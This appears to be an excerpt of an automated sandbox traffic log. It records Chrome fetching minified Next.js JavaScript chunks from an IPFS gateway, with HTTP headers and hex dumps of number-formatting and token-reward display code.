                                                                                                                                                                                                                                                  access-control-expose-headers: X-Ipfs-Roots
                                                                                                                                                                                                                                                  access-control-expose-headers: X-Stream-Output
                                                                                                                                                                                                                                                  Cache-Control: public, max-age=29030400, immutable
                                                                                                                                                                                                                                                  etag: "bafkreiave5xgq6m7p4527dg3bzqvc6kb5utw5ao634gu6x5uumpyksoqaq"
                                                                                                                                                                                                                                                  x-ipfs-path: /ipfs/bafybeihwopeeamsw6gk3vbg3wbftvt3n2qngbzo5a4hlnpvlv4hc3vvmyy/_next/static/chunks/7603.58cb27010e0a12d8.js
                                                                                                                                                                                                                                                  x-ipfs-roots: bafybeihwopeeamsw6gk3vbg3wbftvt3n2qngbzo5a4hlnpvlv4hc3vvmyy,bafybeibkk2t3wa2shw62jhntzsugx2oh7gf6zlbu3gb6gdxmeuwt6wi6se,bafybeihww4l5iuauf4leipzwanhudgpdxwdltpxcn6hqqud65jpcaq33xe,bafybeigaj3cwdjktvw36akiq43niv2siihkxaslemvv33lw5mhruragm5a,bafkreiave5xgq6m7p4527dg3bzqvc6kb5utw5ao634gu6x5uumpyksoqaq
                                                                                                                                                                                                                                                  x-ipfs-pop: rainbow-ny5-04
                                                                                                                                                                                                                                                  CF-Cache-Status: HIT
                                                                                                                                                                                                                                                  Age: 13028472
                                                                                                                                                                                                                                                  2024-09-28 04:11:39 UTC74INData Raw: 41 63 63 65 70 74 2d 52 61 6e 67 65 73 3a 20 62 79 74 65 73 0d 0a 53 65 72 76 65 72 3a 20 63 6c 6f 75 64 66 6c 61 72 65 0d 0a 43 46 2d 52 41 59 3a 20 38 63 61 30 65 34 30 30 37 64 63 30 31 39 38 65 2d 45 57 52 0d 0a 0d 0a
                                                                                                                                                                                                                                                  Data Ascii: Accept-Ranges: bytesServer: cloudflareCF-RAY: 8ca0e4007dc0198e-EWR
                                                                                                                                                                                                                                                  2024-09-28 04:11:39 UTC1304INData Raw: 22 75 73 65 20 73 74 72 69 63 74 22 3b 28 73 65 6c 66 2e 77 65 62 70 61 63 6b 43 68 75 6e 6b 5f 4e 5f 45 3d 73 65 6c 66 2e 77 65 62 70 61 63 6b 43 68 75 6e 6b 5f 4e 5f 45 7c 7c 5b 5d 29 2e 70 75 73 68 28 5b 5b 37 36 30 33 5d 2c 7b 35 37 33 33 33 3a 66 75 6e 63 74 69 6f 6e 28 74 2c 65 2c 72 29 7b 76 61 72 20 6f 3d 72 28 36 37 32 39 34 29 3b 66 75 6e 63 74 69 6f 6e 20 6e 28 29 7b 7d 66 75 6e 63 74 69 6f 6e 20 61 28 74 29 7b 72 65 74 75 72 6e 21 21 28 74 7c 7c 22 22 29 2e 6d 61 74 63 68 28 2f 5c 64 2f 29 7d 66 75 6e 63 74 69 6f 6e 20 69 28 74 29 7b 72 65 74 75 72 6e 20 6e 75 6c 6c 3d 3d 3d 74 7c 7c 76 6f 69 64 20 30 3d 3d 3d 74 7d 66 75 6e 63 74 69 6f 6e 20 73 28 74 29 7b 72 65 74 75 72 6e 20 74 2e 72 65 70 6c 61 63 65 28 2f 5b 2d 5b 5c 5d 2f 7b 7d 28 29 2a
                                                                                                                                                                                                                                                  Data Ascii: "use strict";(self.webpackChunk_N_E=self.webpackChunk_N_E||[]).push([[7603],{57333:function(t,e,r){var o=r(67294);function n(){}function a(t){return!!(t||"").match(/\d/)}function i(t){return null===t||void 0===t}function s(t){return t.replace(/[-[\]/{}()*
                                                                                                                                                                                                                                                  2024-09-28 04:11:39 UTC1369INData Raw: 69 64 61 74 65 50 72 6f 70 73 28 29 3b 76 61 72 20 6f 3d 74 68 69 73 2e 66 6f 72 6d 61 74 56 61 6c 75 65 50 72 6f 70 28 72 29 3b 74 68 69 73 2e 73 74 61 74 65 3d 7b 76 61 6c 75 65 3a 6f 2c 6e 75 6d 41 73 53 74 72 69 6e 67 3a 74 68 69 73 2e 72 65 6d 6f 76 65 46 6f 72 6d 61 74 74 69 6e 67 28 6f 29 2c 6d 6f 75 6e 74 65 64 3a 21 31 7d 2c 74 68 69 73 2e 73 65 6c 65 63 74 69 6f 6e 42 65 66 6f 72 65 49 6e 70 75 74 3d 7b 73 65 6c 65 63 74 69 6f 6e 53 74 61 72 74 3a 30 2c 73 65 6c 65 63 74 69 6f 6e 45 6e 64 3a 30 7d 2c 74 68 69 73 2e 6f 6e 43 68 61 6e 67 65 3d 74 68 69 73 2e 6f 6e 43 68 61 6e 67 65 2e 62 69 6e 64 28 74 68 69 73 29 2c 74 68 69 73 2e 6f 6e 4b 65 79 44 6f 77 6e 3d 74 68 69 73 2e 6f 6e 4b 65 79 44 6f 77 6e 2e 62 69 6e 64 28 74 68 69 73 29 2c 74 68 69
                                                                                                                                                                                                                                                  Data Ascii: idateProps();var o=this.formatValueProp(r);this.state={value:o,numAsString:this.removeFormatting(o),mounted:!1},this.selectionBeforeInput={selectionStart:0,selectionEnd:0},this.onChange=this.onChange.bind(this),this.onKeyDown=this.onKeyDown.bind(this),thi
                                                                                                                                                                                                                                                  2024-09-28 04:11:39 UTC1369INData Raw: 72 29 5b 30 5d 29 3b 76 61 72 20 61 3d 28 74 3d 28 74 2e 6d 61 74 63 68 28 6f 29 7c 7c 5b 5d 29 2e 6a 6f 69 6e 28 22 22 29 2e 72 65 70 6c 61 63 65 28 72 2c 22 2e 22 29 29 2e 69 6e 64 65 78 4f 66 28 22 2e 22 29 3b 72 65 74 75 72 6e 2d 31 21 3d 3d 61 26 26 28 74 3d 74 2e 73 75 62 73 74 72 69 6e 67 28 30 2c 61 29 2b 22 2e 22 2b 74 2e 73 75 62 73 74 72 69 6e 67 28 61 2b 31 2c 74 2e 6c 65 6e 67 74 68 29 2e 72 65 70 6c 61 63 65 28 6e 65 77 20 52 65 67 45 78 70 28 73 28 72 29 2c 22 67 22 29 2c 22 22 29 29 2c 6e 26 26 28 74 3d 22 2d 22 2b 74 29 2c 74 7d 2c 65 2e 70 72 6f 74 6f 74 79 70 65 2e 67 65 74 4e 75 6d 62 65 72 52 65 67 65 78 3d 66 75 6e 63 74 69 6f 6e 28 74 2c 65 29 7b 76 61 72 20 72 3d 74 68 69 73 2e 70 72 6f 70 73 2c 6f 3d 72 2e 66 6f 72 6d 61 74 2c 6e
                                                                                                                                                                                                                                                  Data Ascii: r)[0]);var a=(t=(t.match(o)||[]).join("").replace(r,".")).indexOf(".");return-1!==a&&(t=t.substring(0,a)+"."+t.substring(a+1,t.length).replace(new RegExp(s(r),"g"),"")),n&&(t="-"+t),t},e.prototype.getNumberRegex=function(t,e){var r=this.props,o=r.format,n
                                                                                                                                                                                                                                                  2024-09-28 04:11:39 UTC1369INData Raw: 6e 65 77 20 45 72 72 6f 72 28 22 5c 6e 20 20 20 20 20 20 20 20 20 20 4d 61 73 6b 20 22 2b 74 2b 22 20 73 68 6f 75 6c 64 20 6e 6f 74 20 63 6f 6e 74 61 69 6e 20 6e 75 6d 65 72 69 63 20 63 68 61 72 61 63 74 65 72 3b 5c 6e 20 20 20 20 20 20 20 20 22 29 7d 2c 65 2e 70 72 6f 74 6f 74 79 70 65 2e 73 65 74 50 61 74 63 68 65 64 43 61 72 65 74 50 6f 73 69 74 69 6f 6e 3d 66 75 6e 63 74 69 6f 6e 28 74 2c 65 2c 72 29 7b 63 28 74 2c 65 29 2c 74 68 69 73 2e 63 61 72 65 74 50 6f 73 69 74 69 6f 6e 54 69 6d 65 6f 75 74 3d 73 65 74 54 69 6d 65 6f 75 74 28 28 66 75 6e 63 74 69 6f 6e 28 29 7b 74 2e 76 61 6c 75 65 3d 3d 3d 72 26 26 63 28 74 2c 65 29 7d 29 2c 30 29 7d 2c 65 2e 70 72 6f 74 6f 74 79 70 65 2e 63 6f 72 72 65 63 74 43 61 72 65 74 50 6f 73 69 74 69 6f 6e 3d 66 75 6e
                                                                                                                                                                                                                                                  Data Ascii: new Error("\n Mask "+t+" should not contain numeric character;\n ")},e.prototype.setPatchedCaretPosition=function(t,e,r){c(t,e),this.caretPositionTimeout=setTimeout((function(){t.value===r&&c(t,e)}),0)},e.prototype.correctCaretPosition=fun
                                                                                                                                                                                                                                                  2024-09-28 04:11:39 UTC1369INData Raw: 2e 6c 61 73 74 49 6e 64 65 78 4f 66 28 6e 29 3b 74 3d 6e 26 26 2d 31 21 3d 3d 69 26 26 69 3d 3d 3d 74 2e 6c 65 6e 67 74 68 2d 6e 2e 6c 65 6e 67 74 68 3f 74 2e 73 75 62 73 74 72 69 6e 67 28 30 2c 69 29 3a 74 2c 61 26 26 28 74 3d 22 2d 22 2b 74 29 7d 72 65 74 75 72 6e 20 74 7d 2c 65 2e 70 72 6f 74 6f 74 79 70 65 2e 72 65 6d 6f 76 65 50 61 74 74 65 72 6e 46 6f 72 6d 61 74 74 69 6e 67 3d 66 75 6e 63 74 69 6f 6e 28 74 29 7b 66 6f 72 28 76 61 72 20 65 3d 74 68 69 73 2e 70 72 6f 70 73 2e 66 6f 72 6d 61 74 2e 73 70 6c 69 74 28 22 23 22 29 2e 66 69 6c 74 65 72 28 28 66 75 6e 63 74 69 6f 6e 28 74 29 7b 72 65 74 75 72 6e 22 22 21 3d 3d 74 7d 29 29 2c 72 3d 30 2c 6f 3d 22 22 2c 6e 3d 30 2c 61 3d 65 2e 6c 65 6e 67 74 68 3b 6e 3c 3d 61 3b 6e 2b 2b 29 7b 76 61 72 20 69
                                                                                                                                                                                                                                                  Data Ascii: .lastIndexOf(n);t=n&&-1!==i&&i===t.length-n.length?t.substring(0,i):t,a&&(t="-"+t)}return t},e.prototype.removePatternFormatting=function(t){for(var e=this.props.format.split("#").filter((function(t){return""!==t})),r=0,o="",n=0,a=e.length;n<=a;n++){var i
                                                                                                                                                                                                                                                  2024-09-28 04:11:39 UTC1369INData Raw: 3f 21 5c 64 29 29 2f 67 3b 64 65 66 61 75 6c 74 3a 72 65 74 75 72 6e 2f 28 5c 64 29 28 3f 3d 28 5c 64 7b 33 7d 29 2b 28 3f 21 5c 64 29 29 2f 67 7d 7d 28 72 29 2c 6e 3d 74 2e 73 65 61 72 63 68 28 2f 5b 31 2d 39 5d 2f 29 3b 72 65 74 75 72 6e 20 6e 3d 2d 31 3d 3d 3d 6e 3f 74 2e 6c 65 6e 67 74 68 3a 6e 2c 74 2e 73 75 62 73 74 72 69 6e 67 28 30 2c 6e 29 2b 74 2e 73 75 62 73 74 72 69 6e 67 28 6e 2c 74 2e 6c 65 6e 67 74 68 29 2e 72 65 70 6c 61 63 65 28 6f 2c 22 24 31 22 2b 65 29 7d 28 67 2c 63 2c 73 29 29 2c 6e 26 26 28 67 3d 6e 2b 67 29 2c 61 26 26 28 64 2b 3d 61 29 2c 76 26 26 28 67 3d 22 2d 22 2b 67 29 2c 74 3d 67 2b 28 68 26 26 66 7c 7c 22 22 29 2b 64 7d 2c 65 2e 70 72 6f 74 6f 74 79 70 65 2e 66 6f 72 6d 61 74 4e 75 6d 53 74 72 69 6e 67 3d 66 75 6e 63 74 69
                                                                                                                                                                                                                                                  Data Ascii: ?!\d))/g;default:return/(\d)(?=(\d{3})+(?!\d))/g}}(r),n=t.search(/[1-9]/);return n=-1===n?t.length:n,t.substring(0,n)+t.substring(n,t.length).replace(o,"$1"+e)}(g,c,s)),n&&(g=n+g),a&&(d+=a),v&&(g="-"+g),t=g+(h&&f||"")+d},e.prototype.formatNumString=functi
                                                                                                                                                                                                                                                  2024-09-28 04:11:39 UTC1369INData Raw: 69 7c 7c 22 30 22 29 29 2c 63 3d 28 69 2e 6c 65 6e 67 74 68 3c 3d 65 3f 22 30 2e 22 2b 69 3a 70 2e 74 6f 46 69 78 65 64 28 65 29 29 2e 73 70 6c 69 74 28 22 2e 22 29 3b 72 65 74 75 72 6e 28 73 3f 22 2d 22 3a 22 22 29 2b 61 2e 73 70 6c 69 74 28 22 22 29 2e 72 65 76 65 72 73 65 28 29 2e 72 65 64 75 63 65 28 28 66 75 6e 63 74 69 6f 6e 28 74 2c 65 2c 72 29 7b 72 65 74 75 72 6e 20 74 2e 6c 65 6e 67 74 68 3e 72 3f 28 4e 75 6d 62 65 72 28 74 5b 30 5d 29 2b 4e 75 6d 62 65 72 28 65 29 29 2e 74 6f 53 74 72 69 6e 67 28 29 2b 74 2e 73 75 62 73 74 72 69 6e 67 28 31 2c 74 2e 6c 65 6e 67 74 68 29 3a 65 2b 74 7d 29 2c 63 5b 30 5d 29 2b 28 6f 3f 22 2e 22 3a 22 22 29 2b 6c 28 63 5b 31 5d 7c 7c 22 22 2c 4d 61 74 68 2e 6d 69 6e 28 65 2c 69 2e 6c 65 6e 67 74 68 29 2c 72 29 7d
                                                                                                                                                                                                                                                  Data Ascii: i||"0")),c=(i.length<=e?"0."+i:p.toFixed(e)).split(".");return(s?"-":"")+a.split("").reverse().reduce((function(t,e,r){return t.length>r?(Number(t[0])+Number(e)).toString()+t.substring(1,t.length):e+t}),c[0])+(o?".":"")+l(c[1]||"",Math.min(e,i.length),r)}
                                                                                                                                                                                                                                                  2024-09-28 04:11:39 UTC1369INData Raw: 72 28 3b 74 5b 6e 2d 31 2d 6f 5d 3d 3d 3d 65 5b 61 2d 31 2d 6f 5d 26 26 61 2d 6f 3e 72 26 26 6e 2d 6f 3e 72 3b 29 6f 2b 2b 3b 72 65 74 75 72 6e 7b 73 74 61 72 74 3a 72 2c 65 6e 64 3a 6e 2d 6f 7d 7d 28 65 2c 72 29 2c 79 3d 53 2e 73 74 61 72 74 2c 78 3d 53 2e 65 6e 64 3b 69 66 28 21 61 26 26 79 3d 3d 3d 78 26 26 2d 31 21 3d 3d 66 2e 69 6e 64 65 78 4f 66 28 72 5b 64 5d 29 29 7b 76 61 72 20 77 3d 30 3d 3d 3d 70 3f 22 22 3a 68 3b 72 65 74 75 72 6e 20 72 2e 73 75 62 73 74 72 28 30 2c 64 29 2b 77 2b 72 2e 73 75 62 73 74 72 28 64 2b 31 2c 72 2e 6c 65 6e 67 74 68 29 7d 76 61 72 20 62 3d 61 3f 30 3a 73 2e 6c 65 6e 67 74 68 2c 4e 3d 65 2e 6c 65 6e 67 74 68 2d 28 61 3f 30 3a 6c 2e 6c 65 6e 67 74 68 29 3b 69 66 28 72 2e 6c 65 6e 67 74 68 3e 65 2e 6c 65 6e 67 74 68 7c
                                                                                                                                                                                                                                                  Data Ascii: r(;t[n-1-o]===e[a-1-o]&&a-o>r&&n-o>r;)o++;return{start:r,end:n-o}}(e,r),y=S.start,x=S.end;if(!a&&y===x&&-1!==f.indexOf(r[d])){var w=0===p?"":h;return r.substr(0,d)+w+r.substr(d+1,r.length)}var b=a?0:s.length,N=e.length-(a?0:l.length);if(r.length>e.length|
                                                                                                                                                                                                                                                  2024-09-28 04:11:39 UTC1369INData Raw: 2e 6f 6e 43 68 61 6e 67 65 3d 66 75 6e 63 74 69 6f 6e 28 74 29 7b 76 61 72 20 65 3d 74 2e 74 61 72 67 65 74 2c 72 3d 65 2e 76 61 6c 75 65 2c 6f 3d 74 68 69 73 2e 73 74 61 74 65 2c 6e 3d 74 68 69 73 2e 70 72 6f 70 73 2c 61 3d 6e 2e 69 73 41 6c 6c 6f 77 65 64 2c 69 3d 6f 2e 76 61 6c 75 65 7c 7c 22 22 2c 73 3d 68 28 65 29 3b 72 3d 74 68 69 73 2e 63 6f 72 72 65 63 74 49 6e 70 75 74 56 61 6c 75 65 28 73 2c 69 2c 72 29 3b 76 61 72 20 75 3d 74 68 69 73 2e 66 6f 72 6d 61 74 49 6e 70 75 74 28 72 29 7c 7c 22 22 2c 6c 3d 74 68 69 73 2e 72 65 6d 6f 76 65 46 6f 72 6d 61 74 74 69 6e 67 28 75 29 2c 70 3d 61 28 74 68 69 73 2e 67 65 74 56 61 6c 75 65 4f 62 6a 65 63 74 28 75 2c 6c 29 29 3b 70 7c 7c 28 75 3d 69 29 2c 74 68 69 73 2e 75 70 64 61 74 65 56 61 6c 75 65 28 7b 66
                                                                                                                                                                                                                                                  Data Ascii: .onChange=function(t){var e=t.target,r=e.value,o=this.state,n=this.props,a=n.isAllowed,i=o.value||"",s=h(e);r=this.correctInputValue(s,i,r);var u=this.formatInput(r)||"",l=this.removeFormatting(u),p=a(this.getValueObject(u,l));p||(u=i),this.updateValue({f


                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                  3192.168.2.549715209.94.90.24431076C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                  2024-09-28 04:11:38 UTC677OUTGET /_next/static/chunks/1320.f9a83bb87b7294af.js HTTP/1.1
                                                                                                                                                                                                                                                  Host: bafybeihwopeeamsw6gk3vbg3wbftvt3n2qngbzo5a4hlnpvlv4hc3vvmyy.ipfs.dweb.link
                                                                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                                                                  sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                  sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                  sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                  Accept: */*
                                                                                                                                                                                                                                                  Sec-Fetch-Site: same-origin
                                                                                                                                                                                                                                                  Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                  Sec-Fetch-Dest: script
                                                                                                                                                                                                                                                  Referer: https://bafybeihwopeeamsw6gk3vbg3wbftvt3n2qngbzo5a4hlnpvlv4hc3vvmyy.ipfs.dweb.link/
                                                                                                                                                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                  2024-09-28 04:11:39 UTC1359INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                  Date: Sat, 28 Sep 2024 04:11:38 GMT
                                                                                                                                                                                                                                                  Content-Type: text/javascript; charset=utf-8
                                                                                                                                                                                                                                                  Content-Length: 11915
                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                  access-control-allow-headers: Content-Type
                                                                                                                                                                                                                                                  access-control-allow-headers: Range
                                                                                                                                                                                                                                                  access-control-allow-headers: User-Agent
                                                                                                                                                                                                                                                  access-control-allow-headers: X-Requested-With
                                                                                                                                                                                                                                                  access-control-allow-methods: GET
                                                                                                                                                                                                                                                  access-control-allow-methods: HEAD
                                                                                                                                                                                                                                                  access-control-allow-methods: OPTIONS
                                                                                                                                                                                                                                                  access-control-allow-origin: *
                                                                                                                                                                                                                                                  access-control-expose-headers: Content-Length
                                                                                                                                                                                                                                                  access-control-expose-headers: Content-Range
                                                                                                                                                                                                                                                  access-control-expose-headers: X-Chunked-Output
                                                                                                                                                                                                                                                  access-control-expose-headers: X-Ipfs-Path
                                                                                                                                                                                                                                                  access-control-expose-headers: X-Ipfs-Roots
                                                                                                                                                                                                                                                  access-control-expose-headers: X-Stream-Output
                                                                                                                                                                                                                                                  Cache-Control: public, max-age=29030400, immutable
                                                                                                                                                                                                                                                  etag: "bafkreiahj2zwjt27sx6onqvzhnj6n2dgg7uqyk6jr7xpcjsrjybubtx6fy"
                                                                                                                                                                                                                                                  x-ipfs-path: /ipfs/bafybeihwopeeamsw6gk3vbg3wbftvt3n2qngbzo5a4hlnpvlv4hc3vvmyy/_next/static/chunks/1320.f9a83bb87b7294af.js
                                                                                                                                                                                                                                                  x-ipfs-roots: bafybeihwopeeamsw6gk3vbg3wbftvt3n2qngbzo5a4hlnpvlv4hc3vvmyy,bafybeibkk2t3wa2shw62jhntzsugx2oh7gf6zlbu3gb6gdxmeuwt6wi6se,bafybeihww4l5iuauf4leipzwanhudgpdxwdltpxcn6hqqud65jpcaq33xe,bafybeigaj3cwdjktvw36akiq43niv2siihkxaslemvv33lw5mhruragm5a,bafkreiahj2zwjt27sx6onqvzhnj6n2dgg7uqyk6jr7xpcjsrjybubtx6fy
                                                                                                                                                                                                                                                  x-ipfs-pop: rainbow-dc13-10
                                                                                                                                                                                                                                                  CF-Cache-Status: HIT
                                                                                                                                                                                                                                                  Age: 643332
                                                                                                                                                                                                                                                  2024-09-28 04:11:39 UTC74INData Raw: 41 63 63 65 70 74 2d 52 61 6e 67 65 73 3a 20 62 79 74 65 73 0d 0a 53 65 72 76 65 72 3a 20 63 6c 6f 75 64 66 6c 61 72 65 0d 0a 43 46 2d 52 41 59 3a 20 38 63 61 30 65 34 30 30 36 38 62 39 39 65 30 38 2d 45 57 52 0d 0a 0d 0a
                                                                                                                                                                                                                                                  Data Ascii: Accept-Ranges: bytesServer: cloudflareCF-RAY: 8ca0e40068b99e08-EWR
                                                                                                                                                                                                                                                  2024-09-28 04:11:39 UTC1305INData Raw: 22 75 73 65 20 73 74 72 69 63 74 22 3b 28 73 65 6c 66 2e 77 65 62 70 61 63 6b 43 68 75 6e 6b 5f 4e 5f 45 3d 73 65 6c 66 2e 77 65 62 70 61 63 6b 43 68 75 6e 6b 5f 4e 5f 45 7c 7c 5b 5d 29 2e 70 75 73 68 28 5b 5b 31 33 32 30 5d 2c 7b 39 36 38 37 35 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 6e 2c 72 29 7b 72 2e 64 28 6e 2c 7b 6f 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 6d 7d 7d 29 3b 76 61 72 20 74 3d 72 28 35 39 34 39 39 29 2c 69 3d 72 28 34 37 33 30 29 2c 6f 3d 72 28 34 39 35 30 31 29 2c 63 3d 72 28 31 32 37 39 29 2c 73 3d 72 28 36 32 30 39 37 29 2c 61 3d 72 28 33 30 31 32 30 29 2c 6c 3d 72 28 32 39 36 33 30 29 2c 64 3d 72 28 37 35 30 38 34 29 2c 78 3d 72 28 37 30 37 39 34 29 2c 75 3d 72 28 34 31 30 32 34 29 2c 70 3d 72 28 38 35 38 39 33 29 2c 6a
                                                                                                                                                                                                                                                  Data Ascii: "use strict";(self.webpackChunk_N_E=self.webpackChunk_N_E||[]).push([[1320],{96875:function(e,n,r){r.d(n,{o:function(){return m}});var t=r(59499),i=r(4730),o=r(49501),c=r(1279),s=r(62097),a=r(30120),l=r(29630),d=r(75084),x=r(70794),u=r(41024),p=r(85893),j
                                                                                                                                                                                                                                                  2024-09-28 04:11:39 UTC1369INData Raw: 76 61 72 69 61 6e 74 3a 22 73 65 63 6f 6e 64 61 72 79 31 34 22 2c 63 6f 6c 6f 72 3a 6d 2e 73 75 63 63 65 73 73 2e 6d 61 69 6e 2c 63 68 69 6c 64 72 65 6e 3a 22 5c 75 32 32 31 65 22 7d 29 3a 28 30 2c 70 2e 6a 73 78 29 28 75 2e 42 2c 68 28 7b 76 61 6c 75 65 3a 76 2c 73 78 3a 68 28 7b 63 6f 6c 6f 72 3a 79 7d 2c 66 2e 73 78 29 2c 76 69 73 69 62 6c 65 44 65 63 69 6d 61 6c 73 3a 32 2c 63 6f 6d 70 61 63 74 3a 21 30 7d 2c 66 29 29 2c 72 26 26 28 30 2c 70 2e 6a 73 78 29 28 64 2e 5a 2c 7b 6f 6e 43 6c 69 63 6b 3a 72 2c 76 61 72 69 61 6e 74 3a 22 73 75 72 66 61 63 65 22 2c 73 69 7a 65 3a 22 73 6d 61 6c 6c 22 2c 73 78 3a 7b 6d 69 6e 57 69 64 74 68 3a 22 75 6e 73 65 74 22 2c 6d 6c 3a 7b 78 73 3a 30 2c 78 73 6d 3a 32 7d 7d 2c 63 68 69 6c 64 72 65 6e 3a 28 30 2c 70 2e 6a
                                                                                                                                                                                                                                                  Data Ascii: variant:"secondary14",color:m.success.main,children:"\u221e"}):(0,p.jsx)(u.B,h({value:v,sx:h({color:y},f.sx),visibleDecimals:2,compact:!0},f)),r&&(0,p.jsx)(d.Z,{onClick:r,variant:"surface",size:"small",sx:{minWidth:"unset",ml:{xs:0,xsm:2}},children:(0,p.j
                                                                                                                                                                                                                                                  2024-09-28 04:11:39 UTC1369INData Raw: 73 3a 7b 73 79 6d 62 6f 6c 3a 74 7d 7d 29 7d 29 2c 28 30 2c 68 2e 6a 73 78 73 29 28 6f 2e 5a 2c 7b 73 78 3a 7b 77 69 64 74 68 3a 22 31 30 30 25 22 7d 2c 63 68 69 6c 64 72 65 6e 3a 5b 6e 2e 6d 61 70 28 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 28 30 2c 68 2e 6a 73 78 29 28 66 2e 58 2c 7b 68 65 69 67 68 74 3a 33 32 2c 63 61 70 74 69 6f 6e 3a 28 30 2c 68 2e 6a 73 78 73 29 28 6f 2e 5a 2c 7b 73 78 3a 7b 64 69 73 70 6c 61 79 3a 22 66 6c 65 78 22 2c 61 6c 69 67 6e 49 74 65 6d 73 3a 22 63 65 6e 74 65 72 22 2c 6d 62 3a 6e 2e 6c 65 6e 67 74 68 3e 31 3f 32 3a 30 7d 2c 63 68 69 6c 64 72 65 6e 3a 5b 28 30 2c 68 2e 6a 73 78 29 28 70 2e 54 31 2c 7b 73 79 6d 62 6f 6c 3a 65 2e 72 65 77 61 72 64 54 6f 6b 65 6e 53 79 6d 62 6f 6c 2c 73 78 3a 7b 66 6f 6e 74 53
                                                                                                                                                                                                                                                  Data Ascii: s:{symbol:t}})}),(0,h.jsxs)(o.Z,{sx:{width:"100%"},children:[n.map((function(e){return(0,h.jsx)(f.X,{height:32,caption:(0,h.jsxs)(o.Z,{sx:{display:"flex",alignItems:"center",mb:n.length>1?2:0},children:[(0,h.jsx)(p.T1,{symbol:e.rewardTokenSymbol,sx:{fontS
                                                                                                                                                                                                                                                  2024-09-28 04:11:39 UTC1369INData Raw: 69 76 65 73 4e 65 74 41 50 52 3a 5a 2c 73 79 6d 62 6f 6c 3a 72 7d 29 2c 77 69 74 68 6f 75 74 48 6f 76 65 72 3a 21 30 2c 73 65 74 4f 70 65 6e 3a 62 2c 6f 70 65 6e 3a 79 2c 63 68 69 6c 64 72 65 6e 3a 28 30 2c 68 2e 6a 73 78 73 29 28 6f 2e 5a 2c 7b 73 78 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 7b 70 3a 7b 78 73 3a 22 30 20 34 70 78 22 2c 78 73 6d 3a 22 32 70 78 20 34 70 78 22 7d 2c 62 6f 72 64 65 72 3a 22 31 70 78 20 73 6f 6c 69 64 20 22 2e 63 6f 6e 63 61 74 28 79 3f 65 2e 70 61 6c 65 74 74 65 2e 61 63 74 69 6f 6e 2e 64 69 73 61 62 6c 65 64 3a 65 2e 70 61 6c 65 74 74 65 2e 64 69 76 69 64 65 72 29 2c 62 6f 72 64 65 72 52 61 64 69 75 73 3a 22 34 70 78 22 2c 63 75 72 73 6f 72 3a 22 70 6f 69 6e 74 65 72 22 2c 64 69 73 70 6c 61 79 3a 22 66 6c 65
                                                                                                                                                                                                                                                  Data Ascii: ivesNetAPR:Z,symbol:r}),withoutHover:!0,setOpen:b,open:y,children:(0,h.jsxs)(o.Z,{sx:function(e){return{p:{xs:"0 4px",xsm:"2px 4px"},border:"1px solid ".concat(y?e.palette.action.disabled:e.palette.divider),borderRadius:"4px",cursor:"pointer",display:"fle
                                                                                                                                                                                                                                                  2024-09-28 04:11:39 UTC1369INData Raw: 72 3a 22 63 6f 6d 6d 6f 6e 2e 77 68 69 74 65 22 2c 63 6f 6c 6f 72 3a 22 63 6f 6d 6d 6f 6e 2e 62 6c 61 63 6b 22 2c 6d 6c 3a 2d 31 2c 7a 49 6e 64 65 78 3a 35 7d 2c 63 68 69 6c 64 72 65 6e 3a 28 30 2c 68 2e 6a 73 78 29 28 69 2e 5a 2c 7b 7d 29 7d 29 5d 7d 29 7d 29 7d 29 5d 7d 29 7d 29 7d 7d 2c 34 34 37 34 39 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 6e 2c 72 29 7b 72 2e 64 28 6e 2c 7b 43 68 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 6d 7d 2c 72 24 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 76 7d 2c 61 39 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 79 7d 7d 29 3b 76 61 72 20 74 3d 72 28 35 39 34 39 39 29 2c 69 3d 72 28 34 39 35 30 31 29 2c 6f 3d 72 28 33 38 32 36 34 29 2c 63 3d 72 28 38 31 36 34 35 29 2c 73 3d 72 28 36 32 30
                                                                                                                                                                                                                                                  Data Ascii: r:"common.white",color:"common.black",ml:-1,zIndex:5},children:(0,h.jsx)(i.Z,{})})]})})})]})})}},44749:function(e,n,r){r.d(n,{Ch:function(){return m},r$:function(){return v},a9:function(){return y}});var t=r(59499),i=r(49501),o=r(38264),c=r(81645),s=r(620
